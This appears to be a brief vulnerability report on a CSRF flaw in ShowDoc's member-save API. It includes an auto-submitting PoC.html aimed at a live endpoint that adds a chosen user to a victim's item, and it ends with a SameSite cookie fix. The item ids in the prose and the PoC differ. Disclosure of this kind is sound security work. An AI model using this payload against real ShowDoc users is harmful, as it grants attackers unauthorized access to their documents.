With CSRF vulnerability Attacker able to add any member to for any item if users visit attacker website.
We can bypass the CSRF Protection if we put our payload on a iframe or a html file and send them to victim as after that the Origin header will be set to null
and we can bypass CSRF protection.
1.Open the PoC.html In Firefox or safari.
2.now you can check that member with email address test
that already should registered before have access to item with id 1531601670203340
.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/save" method="POST">
<input type="hidden" name="item_id" value="1531601670203344" />
<input type="hidden" name="username" value="test" />
<input type="hidden" name="cat_id" value="0" />
<input type="hidden" name="member_group_id" value="0" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
This vulnerability is capable of reveal any item.
Set SameSite attribute of cookies to Lax
or Strict
.